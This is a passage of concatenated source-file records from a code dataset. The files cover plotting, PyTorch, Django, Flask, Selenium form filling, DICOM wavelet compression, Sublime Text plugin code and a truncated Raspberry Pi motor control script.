y=1.03)\n#plt.plot(beam_elapb1, normDb1, 'o-', color='blue', markersize=2, label='MKI2D')\n#plt.plot(beam_elapb1, normDCb1, 'o-', color='green', markersize=2, label='Interconnect MKI2D-MKI2C')\nplt.plot(beam_intb1, normQ5Db1, 'o-', color='purple', markersize=2, label='Interconnect Q5-MKI2D')\n#plt.plot(beam_elapb2, normDb2, 'o-', color='red', markersize=2, label='MKI8D')\n#plt.plot(beam_elapb2, normDCb2, 'o-', color='black', markersize=2, label='Interconnect MKI8D-MKI8C')\nplt.plot(beam_intb2, normQ5Db2, 'o-', color='orange', markersize=2, label='Interconnect Q5-MKI8D')\nax=plt.gca()\nplt.xticks(fontsize=12.5)\nplt.yticks(fontsize=13)\nax.yaxis.grid(linestyle='--') # plot horizontal lines\nax.xaxis.label.set_size(13.5)\nax.yaxis.label.set_size(13.5)\nax.set_xlim(0, xupperlim)\nax.set_ylabel(r'Normalized pressure (mbar/p)')\nax.semilogy()\nax.set_ylim(5 * 10 ** -25, 2*10 ** -21)\nax.set_xlabel(r'Beam Integral (C)')\nplt.legend(prop={'size':11.5})\nplt.show()\n\nif PlotVsTime == \"Y\":\n ##PLOT 3 B1 - MKI2 Pressure on various points and beam intensity \n print(\"Plot 5\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n fig.suptitle(titletextb1)\n ax1.plot(aligned_timeb1, pressureDb1, 'o-', color='red', markersize=2, label='MKI2D')\n ax1.plot(aligned_timeb1, pressureDCb1, 'o-', color='magenta', markersize=2, label='Interconnect MKI2D-MKI2C')\n ax1.plot(aligned_timeb1, pressureQ5Db1, 'o-', color='blue', markersize=2, label='Interconnect Q5-MKI2D')\n ax1.set_ylabel(r'Pressure (mbar)')\n ax1.set_ylim(0, 1*10 ** -8)\n #ax1.plt.xticks(fontsize=12.5)\n #ax1.plt.yticks(fontsize=13)\n ax1.xaxis.label.set_size(13.5)\n ax1.yaxis.label.set_size(13.5)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n \n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb1, intensityb1, 'o-', color='green', markersize=2, label='Beam intensity B1')\n ax2.set_ylabel(r'Beam intensity (p)')\n #ax2.yaxis.label.set_size(13.5)\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend(prop={'size':11.5})\n plt.show()\n\n\nif PlotVsTime == \"Y\":\n ##PLOT 4 B2 - MKI8 Pressure on various points and beam intensity \n print(\"Plot 6\")\n fig, ax1 = plt.subplots(figsize=(18,6))\n fig.suptitle(titletextb2)\n ax1.plot(aligned_timeb2, pressureDb2, 'o-', color='red', markersize=2, label='MKI8D')\n ax1.plot(aligned_timeb2, pressureDCb2, 'o-', color='magenta', markersize=2, label='Interconnect MKI8C-MKI8D')\n ax1.plot(aligned_timeb2, pressureQ5Db2, 'o-', color='blue', markersize=2, label='Interconnect MKI8D-Q5')\n ax1.set_ylabel(r'Pressure (mbar)')\n ax1.set_ylim(0, 1*10 ** -8)\n #ax1.set_ylim(10 ** -25, 2*10 ** -20)\n ax1.set_xlabel(r'Date & (UTC) time')\n pytimber.set_xaxis_date(bins=7)\n plt.legend(loc=2, prop={'size':11.5})\n \n ax2 = ax1.twinx()\n ax2.plot(aligned_timeb2, intensityb2, 'o-', color='green', markersize=2, label='Beam intensity B2')\n ax2.set_ylabel(r'Beam intensity (p)')\n ax2.tick_params(axis='y', colors='green')\n ax2.yaxis.label.set_color('green')\n ax2.set_ylim(0, 3.5*10 ** 14)\n plt.legend()\n plt.show()\n\n\n#Plotting time\nplotting_time = time.time()-start_time\nprint(\"Execution time: plotting %0.3f seconds.\" % plotting_time)\n","sub_path":"Aga_vacuum_plots.py","file_name":"Aga_vacuum_plots.py","file_ext":"py","file_size_in_byte":26601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72165363","text":"import os\nimport torch\n\nnet = torch.nn.Linear(3, 2)\nprint(net)\n\nprint(net(torch.tensor([1.0, 0.0, 0.0])))\n\nx_batch = torch.tensor([\n [1.0, 0., 0.],\n [0., 1.0, 0.],\n [0., 0., 1.0],\n [0., 0., 0.],\n])\n\nprint(net(x_batch))\n\nprint(\"weight is: \", net.weight)\nprint(\"bias is: \", net.bias)\n\nfor name, param in net.named_parameters():\n print(f'{name} = {param}\\n')\n\nfor k, v in net.state_dict().items():\n print(f'{k}: {v.type()}{tuple(v.shape)}')\n\ntorch.save(net.state_dict(), \"linear.pth\")\n\nnet.load_state_dict(torch.load(\"linear.pth\"))","sub_path":"pytorch/Basic/NN/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24531088","text":"import math\n\ndef checkPerfectNumber(num):\n \"\"\"\n :param num: int\n :return: bool\n \"\"\"\n acc = 0\n for i in range(1, int(math.sqrt(num)) + 1):\n if num % i == 0:\n acc += i + num / i\n return acc == num\n","sub_path":"normal/507_perfect_number.py","file_name":"507_perfect_number.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"528072258","text":"from django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpRequest\nfrom django.shortcuts import render\nfrom django.views import View\n\nline_of_cars = {\n \"change_oil\": [],\n \"inflate_tires\": [],\n \"diagnostic\": []\n}\nlast_processed_ticket = 0\n\n\nclass WelcomeView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n return HttpResponse(\"

    Welcome to the Hypercar Service!

    \")\n\n\nclass MenuView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n return render(request, \"tickets/menu.html\")\n\n\nclass ProcessingView(View):\n @staticmethod\n def get(request, *args, **kwargs):\n context = {\n \"change_oil_queue\": len(line_of_cars[\"change_oil\"]),\n \"inflate_tires_queue\": len(line_of_cars[\"inflate_tires\"]),\n \"diagnostic_queue\": len(line_of_cars[\"diagnostic\"]),\n }\n return render(request, \"tickets/processing.html\", context)\n\n @staticmethod\n def post(request, *args, **kwargs):\n if line_of_cars[\"change_oil\"]:\n ticket = line_of_cars[\"change_oil\"].pop(0)\n elif line_of_cars[\"inflate_tires\"]:\n ticket = line_of_cars[\"inflate_tires\"].pop(0)\n elif line_of_cars[\"diagnostic\"]:\n ticket = line_of_cars[\"diagnostic\"].pop(0)\n else:\n ticket = None\n\n global last_processed_ticket\n last_processed_ticket = ticket\n\n return HttpResponseRedirect(\"next\")\n\n\ndef next_ticket(request: HttpRequest) -> HttpResponse:\n return render(request, \"tickets/next.html\", context={\"ticket\": last_processed_ticket})\n\n\ndef change_oil(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = len(line_of_cars[\"change_oil\"]) * 2\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"change_oil\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef inflate_tires(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = (len(line_of_cars[\"change_oil\"]) * 2) + \\\n (len(line_of_cars[\"inflate_tires\"]) * 5)\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"inflate_tires\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef diagnostic(request: HttpRequest) -> HttpResponse:\n ticket_num = get_ticket_num()\n wait_time = (len(line_of_cars[\"change_oil\"]) * 2) + \\\n (len(line_of_cars[\"inflate_tires\"]) * 5) + \\\n (len(line_of_cars[\"diagnostic\"]) * 30)\n context = {\n \"ticket_num\": ticket_num,\n \"wait_time\": wait_time\n }\n line_of_cars[\"diagnostic\"].append(ticket_num)\n return render(request, \"tickets/ticket.html\", context)\n\n\ndef get_ticket_num() -> int:\n return len(line_of_cars[\"change_oil\"]) + \\\n len(line_of_cars[\"inflate_tires\"]) + \\\n len(line_of_cars[\"diagnostic\"]) + 1\n","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206813977","text":"import data_coolection as cool\nimport h5py\nimport time\nimport matplotlib.pyplot as plt\n\n# Supress warnings from EPICS\ncool.hush()\nc = cool.Coolector(sample='Dummy',\n sample_uid='NA',\n location='Prototype lab',\n operator='Haavard',\n session='Heating M1 with mount in the prototype',\n description='Heating M1 with mount in the prototype',\n sub_experiment='NA',\n directory='/tmp/')\n# Add devices\ncam = cool.Manta_cam('CAM1', \"Nikkor 600, f4\", \"600\", \"8\", sw_trig=True,\n exposure=.22, gain=0, exposure_max=1.5)\nc.add_device(cam)\n\nprint('Added camera')\n# plt.ion()\n# plt.colorbar(0, 4096)\nfig = plt.figure()\n\n# # cam.auto_exposure()\n\ndef integrate_sq(image, minx, maxx, miny, maxy):\n width = image.shape[0]\n height = image.shape[1]\n # print(width, height)\n # val = 1000\n # for i in range(height):\n # for j in range(10):\n # image[minx+j, i] = val\n # image[maxx+j, i] = val\n # for i in range(width):\n # for j in range(10):\n # image[i, miny+j] = val\n # image[i, maxy+j] = val\n\n sum = 0\n for i in range(minx, maxx):\n for j in range(miny, maxy):\n sum += image[i, j]\n print(sum/((maxx - minx) * (maxy - miny)))\n ax = fig.add_subplot(111)\n ax.matshow(image)\n plt.draw()\n plt.pause(1)\n\n\nwith c:\n while(True):\n # print('Trigger!')\n c.sw_trigger()\n c.wait_for_data()\n with h5py.File(c.latest_file_name, 'r') as f:\n image = f.get(cam.savedata.groupname + 'data')[:]\n integrate_sq(image, 400, 500, 250, 350)\n time.sleep(0.5)\n","sub_path":"continous-plotting.py","file_name":"continous-plotting.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643691282","text":"from unittest import TestCase\nfrom update_file import student_exist\nfrom unittest.mock import patch, mock_open\nfrom student import Student\n\n\nclass TestStudentExist(TestCase):\n @patch(\"class_list.file_read\",\n return_value=[Student(\"May\", \"Chau\", \"A01080616\", True, []),\n Student(\"Amy\", \"Chau\", \"A00000001\", False, [])])\n def test_student_exist_true(self, mock_file):\n self.assertTrue(student_exist(\"A00000001\", 'student.txt'))\n\n @patch(\"class_list.file_read\",\n return_value=[Student(\"May\", \"Chau\", \"A01080616\", True, []),\n Student(\"Amy\", \"Chau\", \"A00000001\", False, [])])\n def test_student_exist_false(self, mock_file):\n self.assertFalse(student_exist(\"A00000003\", 'student.txt'))\n\n @patch(\"class_list.file_read\", side_effect=FileNotFoundError)\n def test_student_exist_file_not_exist(self, mock_file):\n self.assertFalse(student_exist(\"A00000002\", 'student.txt'))\n\n","sub_path":"CRUD/test_student_exist.py","file_name":"test_student_exist.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207727597","text":"from flask_restful import Resource\nfrom flask import request\nfrom models.response import CustomResponse\nfrom models.status import Status\nimport config\nfrom utilities.utils import FileUtilities\nfrom services import DocumentExporterService\nfrom utilities import MODULE_CONTEXT\nfrom anuvaad_auditor.loghandler import log_info, log_exception\nfrom common.errors import ServiceError,DataEmptyError\nfrom common.errors import InternalServerError\n\nfile_ops = FileUtilities()\nexportService=DocumentExporterService()\n\nclass DocumentExporterResource(Resource):\n\n def post(self):\n body = request.get_json()\n log_info(\"request received\", MODULE_CONTEXT)\n try:\n if 'record_id' not in body or not body['record_id'] or 'user_id' not in body or not body['user_id'] or 'file_type' not in body or not body['file_type']:\n res = CustomResponse(Status.ERR_GLOBAL_MISSING_PARAMETERS.value,None)\n return res.getresjson(), 400\n record_id = body['record_id']\n user_id = body['user_id']\n file_type = body['file_type']\n\n log_info(\"DocumentExporterResource request received | {}\".format(body),MODULE_CONTEXT)\n\n formated_document = exportService.export_document(record_id, user_id, file_type)\n if formated_document ==False:\n log_info(\"Error occured at resource level due to service operation\", MODULE_CONTEXT)\n res = CustomResponse(Status.DATA_NOT_FOUND.value,None)\n return res.getresjson(), 400\n\n log_info(\"document type %s saved successfully\"%file_type, MODULE_CONTEXT)\n res = CustomResponse(Status.SUCCESS.value, formated_document)\n return res.getres()\n except ServiceError as e:\n log_exception(\"Error occured at resource level due to service operation\", MODULE_CONTEXT, e)\n res = CustomResponse(Status.OPERATION_NOT_PERMITTED.value,None)\n return res.getresjson(), 400\n except Exception as e:\n log_exception(\"Error occured at resource level due to {}\".format(str(e)), MODULE_CONTEXT, e)\n res = CustomResponse(Status.OPERATION_NOT_PERMITTED.value,None)\n return res.getresjson(), 400","sub_path":"anuvaad-etl/anuvaad-extractor/document-converter/src/resources/export_doc.py","file_name":"export_doc.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"401266741","text":"import numpy as np\nimport cv2\nfrom skimage import exposure\nimport pydicom as dicom\nimport pylab as pl\nfrom PIL.Image import fromarray\nfrom PIL import Image\nimport pylibjpeg\nimport scipy.signal as scs\nimport sys\nimport matplotlib.path as mplPath\nimport scipy.misc\nimport random\nimport string\nimport os\ndef get_random_string():\n result_str = ''.join(random.choice(string.ascii_letters) for i in range(12))\n return result_str\n\n\ndef get_compression_image(name):\n\n d = dicom.dcmread(name)\n f = open(get_random_string() + '.txt', 'w')\n\n print(str(d))\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n cv2.imshow('ttttt1', np.uint8(gray))\n path = 'SavedFiles/' + get_random_string() + '.jpg'\n cv2.imwrite(path, np.uint8(wavelet(gray)[0]))\n\n return path\n\ndef get_original_image(name):\n\n d = dicom.dcmread(name)\n f = open('test1.txt', 'a')\n\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n path = 'SavedFiles/' + get_random_string() + '.jpg'\n cv2.imwrite(path, np.uint8(gray))\n\n return path\n\ndef get_wavelet(name):\n\n d = dicom.dcmread(name)\n f = open('test1.txt', 'a')\n\n f.write(str(d))\n\n gray = d.pixel_array\n gray[gray < 300] = 0\n gray = (gray/3377)\n gray[gray > 1.0] = 1\n\n gray = gray * 255\n\n\n return wavelet(gray)\n\n# Array = np.zeros((int(d.Rows), int(d.Columns)), dtype=d.pixel_array.dtype)\n# cv2.imwrite(\"SavedFiles/original.jpg\", d.pixel_array)\n# print(Array.shape)\n#\n# Array[:,:] = d.pixel_array / 128\n#\n# Array[Array > 256] = 0\n#\n# Array = Array * 128\n#\n#\n# gray = Array\n\n\n\n# image = cv2.imread('0004.jpg')\n# gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)#\n# print(np.max(gray))\n#t = ycbcr(image)\n\n# print(t[0])\n\n\n# arr = np.array([[13,12,16,15], [15,14,11,19],[12,13,18,15], [11,14,17,16]])\n\n\n\ndef wavelet(arr):\n WL = []\n WH = []\n arr = np.int16(arr)\n\n for i in range(arr.shape[0]):\n temp = []\n for j in range(0, arr.shape[1], 2):\n temp.append((arr[i][j] + arr[i][j + 1]) / 2.)\n WL.append(temp)\n\n\n for i in range(arr.shape[0]):\n temp = []\n for j in range(0, arr.shape[1], 2):\n temp.append((arr[i][j] - arr[i][j + 1]) / 2.)\n WH.append(temp)\n\n WLL = []\n WLH = []\n\n for i in range(0, len(WL), 2):\n temp = []\n for j in range(len(WL[0])):\n temp.append((WL[i][j] + WL[i + 1][j]) / 2.)\n WLL.append(temp)\n # print(len(WLL))\n\n for i in range(0, len(WL), 2):\n temp = []\n for j in range(len(WL[0])):\n temp.append((WL[i][j] - WL[i + 1][j]) / 2.)\n WLH.append(temp)\n\n WHL = []\n WHH = []\n\n for i in range(0, len(WH), 2):\n temp = []\n for j in range(len(WH[0])):\n temp.append((WH[i][j] + WH[i + 1][j]) / 2.)\n WHL.append(temp)\n\n for i in range(0, len(WH), 2):\n temp = []\n for j in range(len(WH[0])):\n temp.append((WH[i][j] - WH[i + 1][j]) / 2.)\n WHH.append(temp)\n return WLL, WLH, WHL, WHH\n\n# function dekomprimering(WLL, WLH, WHL, WHH){\n# let WL = [];\n# for(let i=0; i HTTPResponse:\n \"\"\"\n\n :return:\n \"\"\"\n try:\n querys = request.json[\"querys\"]\n result = json.loads(ip.app(querys))\n localtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n res_dic = {\n \"result\": result,\n \"time\": localtime\n }\n log_res = json.dumps(res_dic, ensure_ascii=False)\n logger.info(log_res)\n return response.json(res_dic)\n except Exception as e:\n logger.info(e)\n\n\n@app.post('model/parse')\nasync def nlu_predict(request: Request) -> HTTPResponse:\n \"\"\"\n nlu接口, intent + slot拼装返回\n 返回的数据结构见resource/nlu输出数据结构.json\n :param request:\n :return:\n \"\"\"\n try:\n querys = request.json[\"text\"]\n result = json.loads(ip.app([querys]))\n entities = get_slot_result(querys)\n localtime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n res_dic = {\n \"intent\": result['intents'][0],\n \"intent_ranking\": result['intents'],\n \"entities\": entities\n }\n log_res = json.dumps(res_dic, ensure_ascii=False)\n logger.info(log_res)\n return response.json(res_dic)\n except Exception as e:\n logger.info(e)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=9016, auto_reload=True)\n","sub_path":"server/run_server.py","file_name":"run_server.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513913972","text":"#-*- coding: utf-8 -*-\n# stino/stpanel.py\n\nimport sublime\nimport threading\nimport time\n\ndef isPanel(view):\n\tstate = True\n\tfile_name = view.file_name()\n\tname = view.name()\n\tif file_name or name:\n\t\tstate = False\n\treturn state\n\nclass STPanel:\n\tdef __init__(self, name = 'stino_log'):\n\t\tself.name = name\n\t\tself.show_text = ''\n\t\twindow = sublime.active_window()\n\t\tif not (window is None):\n\t\t\tself.panel = window.get_output_panel(self.name)\n\t\telse:\n\t\t\tself.panel = None\n\n\tdef addText(self, text):\n\t\tif self.panel is None:\n\t\t\twindow = sublime.active_window()\n\t\t\tif not (window is None):\n\t\t\t\tself.panel = window.get_output_panel(self.name)\n\t\tif not (self.panel is None):\n\t\t\tself.show_text += text\n\t\t\tshow_thread = threading.Thread(target=self.show)\n\t\t\tshow_thread.start()\n\n\tdef show(self):\n\t\tsublime.set_timeout(self.update, 0)\n\n\tdef update(self):\n\t\tif self.show_text:\n\t\t\tpanel_edit = self.panel.begin_edit()\n\t\t\tself.panel.insert(panel_edit, self.panel.size(), self.show_text)\n\t\t\tself.panel.end_edit(panel_edit)\n\t\t\tself.panel.show(self.panel.size())\n\t\t\tself.show_text = ''\n\n\t\t\twindow = sublime.active_window()\n\t\t\tpanel_name = 'output.' + self.name\n\t\t\twindow.run_command(\"show_panel\", {\"panel\": panel_name})\n\n\tdef clear(self):\n\t\tpanel_edit = self.panel.begin_edit()\n\t\tself.panel.replace(panel_edit, sublime.Region(0, self.panel.size()), '')\n\t\tself.panel.end_edit(panel_edit)\n\n\tdef toggleWordWrap(self):\n\t\tself.panel.run_command('toggle_setting', {'setting': 'word_wrap'})\n\nclass MonitorView:\n\tdef __init__(self, name = 'Serial Monitor - Serial Port'):\n\t\tself.name = name\n\t\tself.show_text = ''\n\t\tself.window = sublime.active_window()\n\t\tif not (self.window is None):\n\t\t\tself.view = self.findInOpendView(self.name)\n\t\t\tif self.view is None:\n\t\t\t\tself.view = self.window.new_file()\n\t\t\t\tself.view.set_name(self.name)\n\t\telse:\n\t\t\tself.view = None\n\n\tdef findInOpendView(self, view_name):\n\t\topened_view = None\n\t\tfound = False\n\t\twindows = sublime.windows()\n\t\tfor window in windows:\n\t\t\tviews = window.views()\n\t\t\tfor view in views:\n\t\t\t\tname = view.name()\n\t\t\t\tif name == view_name:\n\t\t\t\t\topened_view = view\n\t\t\t\t\tfound = True\n\t\t\t\t\tbreak\n\t\t\tif found:\n\t\t\t\tbreak\n\t\treturn opened_view\n\n\tdef addText(self, text):\n\t\tif self.view is None:\n\t\t\tself.window = sublime.active_window()\n\t\t\tif not (self.window is None):\n\t\t\t\tself.view = self.findInOpendView(self.name)\n\t\t\t\tif self.view is None:\n\t\t\t\t\tself.view = self.window.new_file()\n\t\t\t\t\tself.view.set_name(self.name)\n\t\tif not (self.view is None):\n\t\t\tself.show_text += text\n\t\t\tshwo_thread = threading.Thread(target=self.show)\n\t\t\tshwo_thread.start()\n\n\tdef show(self):\n\t\tsublime.set_timeout(self.update, 0)\n\n\tdef update(self):\n\t\tif self.show_text:\n\t\t\tview_edit = self.view.begin_edit()\n\t\t\tself.view.insert(view_edit, self.view.size(), self.show_text)\n\t\t\tself.view.end_edit(view_edit)\n\t\t\tself.view.show(self.view.size())\n\t\t\tself.show_text = ''\n\n\tdef raiseToFront(self):\n\t\tself.window.focus_view(self.view)\n\n\tdef toggleWordWrap(self):\n\t\tself.view.run_command('toggle_setting', {'setting': 'word_wrap'})\n","sub_path":"Lib/Sublime Text 2/sublime-text-2/Backup/20140109131440/Arduino-like IDE/stino/stpanel.py","file_name":"stpanel.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385025928","text":"#!/usr/bin/python\n\nclass CONST:\n WORKER_HOST_ADDR = \"10.5.4.26\"\n WORKER_HOST_PORT = 8013\n WORKER_ID = \"0\"\n DB_HOST = \"10.5.2.22\"\n DB_USERNAME = \"bridge\"\n DB_PASSWORD = \"12345678\"\n DB_DATABASE = \"Bridge\"\n\n DB_OVERHEAD_TBL = 'overHead'\n DB_TASKID_TBL = 'taskIDInfo'\n DB_IDSEED_TBL = 'idSeed'\n\n DB_TABLES_OVERHEAD = (\n \"CREATE TABLE overHead (\"\n \" ID INT NOT NULL,\"\n \" STATE VARCHAR(5) NOT NULL,\"\n \" PRIMARY KEY (ID))\"\n )\n\n DB_TABLES_TASKINFO = (\n \"CREATE TABLE taskIDInfo (\"\n \" WORKER_ID INT NOT NULL,\"\n \" MAX INT NOT NULL,\"\n \" inProc INT NOT NULL,\"\n \" pending INT NOT NULL,\"\n \" PRIMARY KEY (wID))\"\n )\n\n DB_TABLES_IDSEED = (\n \"CREATE TABLE idSeed (\" \n \" seed INT NOT NULL\"\n \")\"\n )\n\n WORKING_DIR = \"E:/WORKING_DIR/\"\n PROJECT_NAME = \"OT6800\"\n\n COMPILE_ROOT = \"./gbn/src\"\n COMPILE_COMMAND = [\n \".\\\\TiNetS8600_build_bootrom.bat 1\",\n \".\\\\TiNetS8600_build_host.bat 1\"\n ]\n\n RESULT_FILES = [\n # ControlBoard \n [\"boot/config/OT6800_CONTROL_BSP/image/\", \"bootrom_flash.bin\", \"host.arj\"]\n ]\n\n COMPRESS_FILE_NAME = \"COMPRESS.zip\"\n\n COMPILE_INFO_TRANSFER_BYTES = 4096\n","sub_path":"server-side/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"311838455","text":"#!/usr/bin/python\nimport mmap\nimport os\n\ncount = 0\nwith open('/tmp/kdd99extractor_connection_queue.bin', 'r+b') as file:\n mm = mmap.mmap(file.fileno(), 0)\n try:\n while True:\n try:\n flag = mm.read(1)\n if flag[0] != 0:\n mm.seek(-1, os.SEEK_CUR)\n mm.write_byte(0)\n data = mm.read(255)\n count += 1\n print(data.decode('unicode_escape'))\n else:\n mm.seek(-1, os.SEEK_CUR)\n except IndexError:\n mm.seek(0)\n except KeyboardInterrupt:\n print(count)\n mm.close()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330894887","text":"import pickle\n\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom settings import *\n\n\nclass Browser:\n APP_URL = 'https://xmuxg.xmu.edu.cn/app/214'\n LOGIN_URL = 'http://xmuxg.xmu.edu.cn/xmu/app/214'\n chrome_option = Options()\n chrome_option.add_argument('--disable-extensions')\n chrome_option.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n\n def __init__(self):\n self.driver = webdriver.Chrome(executable_path='driver/chromedriver.exe')\n\n def login(self):\n self.driver.get(self.LOGIN_URL)\n print('登陆过期,请登陆你的账号。')\n input('登录之后请在该窗口输入回车。')\n cookies = self.driver.get_cookies()\n pickle.dump(cookies, open('cookies.txt', 'wb'))\n\n def load_cookie(self):\n try:\n self.driver.get(self.APP_URL)\n cookies = pickle.load(open('cookies.txt', 'rb'))\n for cookie in cookies:\n if 'expiry' in cookie:\n del cookie['expiry']\n self.driver.add_cookie(cookie)\n self.driver.get(self.APP_URL)\n print(\"cookie loaded\")\n except Exception as e:\n print(\"ERROR:\")\n print(e)\n print(\"---------\")\n\n def wait_an_element_by_xpath(self, xpath):\n try:\n element = WebDriverWait(self.driver, LOAD_TIME).until(\n lambda driver: driver.find_element_by_xpath(xpath)\n )\n return element\n except Exception as e:\n print(\"连接超时。如要设置更长的等待时间,请打开 settings.py 文件,修改LOAD_TIME为更大值(单位:秒)\")\n print(\"ERROR:\")\n print(e)\n print(\"---------\")\n exit(1)\n\n def fill(self):\n self.wait_an_element_by_xpath(\"//div[@title='我的表单']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538796361']//span[1]\").text != '37.3以下 Below 37.3 degree celsius':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538796361']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='37.3以下 Below 37.3 degree celsius']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538846920']//span[1]\").text != '否 No':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538846920']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='否 No']\").click()\n if self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538939790']//span[1]\").text != '是 Yes':\n self.wait_an_element_by_xpath(\"//div[@data-name='select_1582538939790']\").click()\n self.wait_an_element_by_xpath(\"//label[@title='是 Yes']\").click()\n self.wait_an_element_by_xpath(\"//span[@class='form-save position-absolute']\").click()\n\n def run(self):\n self.load_cookie()\n if self.driver.current_url != self.APP_URL:\n self.login()\n self.fill()\n\n # def __del__(self):\n # self.driver.close()\n","sub_path":"Browser.py","file_name":"Browser.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"290452286","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom banzai.flats import FlatNormalizer\nfrom banzai.tests.utils import FakeImage\nimport numpy as np\nimport pytest\n\n\n@pytest.fixture(scope='module')\ndef set_random_seed():\n np.random.seed(9723492)\n\n\ndef test_no_input_images(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([])\n assert len(images) == 0\n\n\ndef test_group_by_keywords(set_random_seed):\n normalizer = FlatNormalizer(None)\n assert normalizer.group_by_keywords is None\n\n\ndef test_header_has_flatlevel(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([FakeImage(image_multiplier=2.0) for _ in range(6)])\n for image in images:\n assert image.header['FLATLVL'] == 2.0\n\n\ndef test_header_flatlevel_is_5(set_random_seed):\n normalizer = FlatNormalizer(None)\n images = normalizer.do_stage([FakeImage(image_multiplier=5.0) for _ in range(6)])\n for image in images:\n assert image.header['FLATLVL'] == 5.0\n\n\ndef test_flat_normalization_is_reasonable(set_random_seed):\n flat_variation = 0.05\n input_level = 10000.0\n nx = 101\n ny = 103\n\n normalizer = FlatNormalizer(None)\n images = [FakeImage() for _ in range(6)]\n flat_pattern = np.random.normal(1.0, flat_variation, size=(ny, nx))\n for image in images:\n image.data = np.random.poisson(flat_pattern * input_level).astype(float)\n\n images = normalizer.do_stage(images)\n\n for image in images:\n # For right now, we only use a quarter of the image to calculate the flat normalization\n # because real ccds have crazy stuff at the edges, so the S/N is cut down by a factor of 2\n # Assume 50% slop because the variation in the pattern does not decrease like sqrt(n)\n assert np.abs(image.header['FLATLVL'] - input_level) < (3.0 * flat_variation * input_level / (nx * ny) ** 0.5)\n assert np.abs(np.mean(image.data) - 1.0) <= 3.0 * flat_variation / (nx * ny) ** 0.5\n","sub_path":"banzai/tests/test_flat_normalizer.py","file_name":"test_flat_normalizer.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113845095","text":"import pygame\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\n\ndef main():\n pygame.init()\n surface = pygame.display.set_mode([250, 250])\n surface.fill((0, 0, 0))\n pygame.display.set_caption(\"control\")\n setting = Settings()\n status = Status()\n GPIO_init()\n d1 = GPIO.PWM(setting.d_1, 10000)\n d2 = GPIO.PWM(setting.d_2, 10000)\n f1 = GPIO.PWM(setting.f_1, 10000)\n f2 = GPIO.PWM(setting.f_2, 10000)\n f1.start(0)\n f2.start(0)\n d1.start(0)\n d2.start(0)\n while True:\n check_event(status)\n 